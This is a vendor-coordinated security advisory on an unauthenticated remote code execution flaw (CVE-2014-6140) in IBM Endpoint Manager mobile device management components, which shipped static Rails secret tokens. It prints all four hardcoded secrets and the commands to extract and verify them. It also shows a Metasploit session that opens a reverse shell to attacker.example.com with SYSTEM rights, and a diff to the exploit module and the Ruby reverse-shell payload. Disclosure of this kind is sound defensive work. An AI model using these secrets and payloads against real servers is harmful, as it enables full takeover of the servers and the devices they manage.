Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components During a penetration test, RedTeam Pentesting discovered that several IBM Endpoint Manager Components are based on Ruby on Rails and use static secret_token values. With these values, attackers can create valid session cookies containing marshalled objects of their choosing. This can be leveraged to execute arbitrary code when the Ruby on Rails application unmarshals the cookie. Details ======= Product: IBM Endpoint Manager for Mobile Devices Affected Components: Enrollment and Apple iOS Management Extender, Mobile Device Management Self-Service Portal, Mobile Device Management Admin Portal and Trusted Service Provider Affected Versions: All versions prior to 9.0.60100 Fixed Versions: 9.0.60100 Vulnerability Type: Unauthenticated Remote Code Execution Security Risk: high Vendor URL: http://www-03.ibm.com/software/products/en/ibmendpmanaformobidevi http://www-01.ibm.com/support/docview.wss?uid=swg21691701 Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-012 Advisory Status: published CVE: CVE-2014-6140 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6140 Introduction ============ "IBM Endpoint Manager for Mobile Devices provides a completely integrated approach for managing, securing, and reporting on laptops, desktops, servers, smartphones, tablets, and even specialty devices such as point-of-sale terminals. This provides customers with unprecedented real-time visibility and control over all devices employees use in their daily job functions; reducing costs, increasing productivity, and improving compliance." (from the vendor's homepage) More Details ============ IBM Endpoint Manager for Mobile Devices is part of the IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) product family. Several components related to mobile device management can be installed either on the main TEM Server, or on so-called TEM Relays, and are then accessible via HTTPS at port 443 of the respective system, such as: Path Component / Enrollment and Apple iOS Management Extender /ssp/ Mobile Device Management Self-Service Portal /ap/ Mobile Device Management Admin Portal /tsp/ Trusted Service Provider When issuing HTTP requests to any of these paths, the respective server responds in a manner similar to the following example: $ curl -skI https://tem.example.com/ HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 X-UA-Compatible: IE=Edge,chrome=1 [...] Set-Cookie: _mdm_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjU wODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkk iMTQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ 9BjsARg%3D%3D--e48265ee63dd90381caa92248d27162f67b1ea06; path=/; secure; HttpOnly [...] X-Rack-Cache: miss Content-Length: 0 Server: Jetty(8.1.14.v20131031) While the Server header indicates that the web applications are hosted on a Jetty Java application server, the X-Rack-Cache header and the cookie format are typically used by Ruby on Rails applications. The cookie is in fact a Base64 encoded marshalled Ruby object protected by an HMAC (the hexadecimal value following the two dashes). The cookie value can be unmarshalled as follows: $ ruby -e 'puts Marshal.load("BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZj'\ 'YTIxNjUwODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiM'\ 'TQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg==".'\ 'unpack("m0")[0])' {"session_id"=>"8cf6ca2165088581b161cafa0a604837", "_csrf_token"=>"46KewnSgCW1xjZ7XR3HK265eAiOmkl1o/daRN5x3v94="} To create a cookie with a valid HMAC requires knowledge of a secret stored on the application server. In Ruby on Rails version 3 applications, this value is normally stored in the variable secret_token that is set in the file config/initializers/secret_token.rb. It is good practice to generate these values randomly when an application is installed. The IBM Endpoint Manager components, however, use static values that are the same across all installations. These values can be determined by manually inspecting the web application archives (e.g. ap.war, ios.war, ssp.war, tsp.war) installed into the directory C:\Program Files\BigFix Enterprise\Management Extender\MDM Provider\webapps of the respective server. The Enrollment and Apple iOS Management Extender, for example, is contained in the file ios.war. The archive contains a Ruby on Rails web application that was compiled to Java class files. The secret token needed for calculating the HMAC is contained in the file WEB-INF/config/initializers/secret_token.class: $ strings WEB-INF/config/initializers/secret_token.class \ | egrep -o '[0-9a-f]{128}' 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e0 2cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365 It can be verified that this secret is used for generating the HMAC that protects the cookie value by using the OpenSSL command line utility to calculate an HMAC of the aforementioned Base64 encoded data: $ echo -n 'BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjUwODg1ODFiMT'\ 'YxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMTQ2S2V3blNnQ1cxeG'\ 'paN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg=='\ | openssl dgst -sha1 -hmac '65c0eb133b2c8481b08b41cfc0969cbdd540f3c1'\ 'ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd'\ '4895a4e2805712fa6365' (stdin)= e48265ee63dd90381caa92248d27162f67b1ea06 The resulting value is identical to the HMAC originally appended to the cookie. Once the secret is known, arbitrary cookie values can be crafted and sent to the respective application for further processing. As demonstrated by Metasploit's rails_secret_deserialization exploit module[0], this can be leveraged into executing arbitrary code on the application server (see also Proof of Concept below). For reference, the following cookie names and secret_token values were identified for the different web applications: Enrollment and Apple iOS Management Extender Path: / Cookie: _mdm_session Secret: 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730 d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365 Mobile Device Management Self-Service Portal Path: /ssp/ Cookie: _self-service-portal_session Secret: c5f5da7e3ae1baa9a10f4429b5e7c8aec217b3b53851272bd8f533d47acade48 0863a810630039c7987b04ff70c125512e74a998f8a028080c05265a97c747a3 Mobile Device Management Admin Portal Path: /ap/ Cookie: _admin-portal_session Secret: 2556dea5fbbd90c4a79202a43bdf9bd4c391c67159d021ea8bc478f29801d024 78acb273c2f425cf487c27669af5dbc3fdaf7f870e23a0a544dee04ab2169220 Trusted Service Provider Path: /tsp/ Cookie: _trusted-services-provider_session Secret: b52a3979462299e3a11f6c7c893a980f312fa8e5944fb8fdc74a400c55677aed ba00ce6df9e2d9ef1525c6ab68a2b6dca9e9ba557c0c6d579a1325ec6338178b Exploiting the Trusted Service Provider application was not tested, due to the lack of a properly configured testing environment. However, it is a Ruby on Rails web application deployed to the Jetty application server just like the other applications so that it is likely also vulnerable. This was confirmed by the vendor. Proof of Concept ================ The following listing shows a sample Metasploit session demonstrating the execution of arbitrary code through the Enrollment and Apple iOS Management Extender application: ------------------------------------------------------------------------ msf > use exploit/multi/http/rails_secret_deserialization msf exploit(rails_secret_deserialization) > set PAYLOAD ruby/shell_reverse_tcp PAYLOAD => ruby/shell_reverse_tcp msf exploit(rails_secret_deserialization) > set LHOST attacker.example.com LHOST => attacker.example.com msf exploit(rails_secret_deserialization) > set RHOST tem.example.com RHOST => tem.example.com msf exploit(rails_secret_deserialization) > set RPORT 443 RPORT => 443 msf exploit(rails_secret_deserialization) > set SSL true SSL => true msf exploit(rails_secret_deserialization) > set SSLVERSION TLS1 SSLVERSION => TLS1 msf exploit(rails_secret_deserialization) > set SECRET 65c0eb133b2c8481 b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610a d7dc00f6f9942e3825fd4895a4e2805712fa6365 SECRET => 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d097 30d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365 msf exploit(rails_secret_deserialization) > set PrependFork false PrependFork => false msf exploit(rails_secret_deserialization) > exploit [*] Started reverse handler on attacker.example.com:4444 [*] Checking for cookie [*] Adjusting cookie name to _mdm_session [+] SECRET matches! Sending exploit payload [*] Sending cookie _mdm_session [*] Command shell session 1 opened (attacker.example.com:4444 -> tem.example.com:50169) at 2014-08-15 13:37:31 +0200 cmd.exe /c ver whoami Microsoft Windows [Version 6.1.7601] nt authority\system ------------------------------------------------------------------------ The following changes needed to be applied to the Metasploit Framework to be able to exploit the issue. Most of them were required to address peculiarities of the Java/JRuby environment, such as the lack of support for Kernel.fork(): ------------------------------------------------------------------------ diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 7803dd5..e72d8c2 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -141,20 +141,25 @@ class Metasploit3 < Msf::Exploit::Remote # - # This stub ensures that the payload runs outside of the Rails process - # Otherwise, the session can be killed on timeout + # This stub tries to ensure that the payload runs outside of the Rails + # process Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first - if RUBY_PLATFORM =~ /mswin|mingw|win32/ - inp = IO.popen("ruby", "wb") rescue nil - if inp - inp.write(code) - inp.close - end + if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen("ruby", "wb") rescue nil) + inp.write(code) + inp.close else - Kernel.fork do + def _fork + begin + Kernel.fork + rescue NotImplementedError + -1 + end + end + pid = _fork + if 0 == pid or -1 == pid eval(code) end end @@ -234,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => datastore['HTTP_METHOD'], }, 25) if res && !res.get_cookies.empty? - match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) + match = res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/) end if match diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index f17c669..0100929 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb @@ -37,8 +37,31 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - "require 'socket';c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" + - "$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" + - "(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }" + ruby = <<-EOF +require 'socket' +c=TCPSocket.new("#{lhost}", #{datastore['LPORT'].to_i}) +def reopen(old, new) + begin + old.reopen(new) + rescue IOError => e + new + end +end + +$stdin = reopen($stdin, c) +$stdout = reopen($stdout, c) +$stderr = reopen($stderr, c) +$stdin.each_line{ |l| l=l.strip + + next if l.length==0 + + (IO.popen(l,"rb") { |fd| + fd.each_line { |o| + c.puts(o.strip) + } + }) rescue nil +} + EOF + ruby end end ------------------------------------------------------------------------ Workaround ========== It might be possible to binary patch the Java class files to use a different secret_token value and redeploy the application. This is untested, however. Fix === Install version 9.0.60100 of the affected software components. Security Risk ============= The vulnerability allows unauthenticated remote attackers to execute arbitrary code with administrative privileges on the affected systems. It is highly likely that a successful attack on the application server can also be leveraged into a full compromise of all devices managed through the product. This constitutes a high risk. Timeline ======== 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-08-15 Vendor notified, vendor acknowledges receiving the advisory 2014-09-03 Update requested from vendor 2014-09-05 Vendor promises to respond with more details 2014-09-26 Update requested from vendor 2014-09-30 Vendor promises to respond with more details 2014-10-16 Update requested from vendor 2014-10-16 Vendor responds with CVE-ID, plans release for mid-November 2014-11-06 More definite release schedule requested 2014-11-12 Vendor plans release for last week of November 2014-11-21 Additional details requested from vendor 2014-11-22 Vendor responds with details, postpones release to mid-December due to issues discovered during quality control 2014-12-01 Vendor announces imminent release 2014-12-01 Vendor releases security bulletin and software upgrade 2014-12-02 Customer approves public disclosure 2014-12-02 Advisory released References ========== [0] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rb RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen